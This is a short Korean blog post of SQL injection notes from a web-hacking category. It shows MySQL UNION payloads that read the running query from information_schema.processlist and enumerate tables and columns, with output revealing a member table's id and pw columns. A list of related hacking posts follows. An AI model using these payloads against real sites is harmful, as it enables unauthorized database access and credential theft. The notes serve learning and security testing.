select id, pw from member where id='' union select info, 1 from information_schema.processlist;
->select id, pw from member where id='' union select info, 1 from information_schema.processlist
//쿼리를 모를 때 전체 쿼리를 반환받아볼 수 있음
select table_name from information_schema.tables where table_schema=database();
-> member, test_table
select column_name from information_schema.columns where table_name='member';
-> id, pw, no
'HACKING > Web hacking' 카테고리의 다른 글
| Practical Web Cache Poisoning (0) | 2020.01.05 |
|---|---|
| mysql group_concat (0) | 2018.04.04 |
| SQL injection msql.innodb_table_stats (0) | 2018.02.24 |
| sql injection 참고 (0) | 2018.02.10 |
| LFI Exploit with PHP Protocols / Wrappers (0) | 2017.11.30 |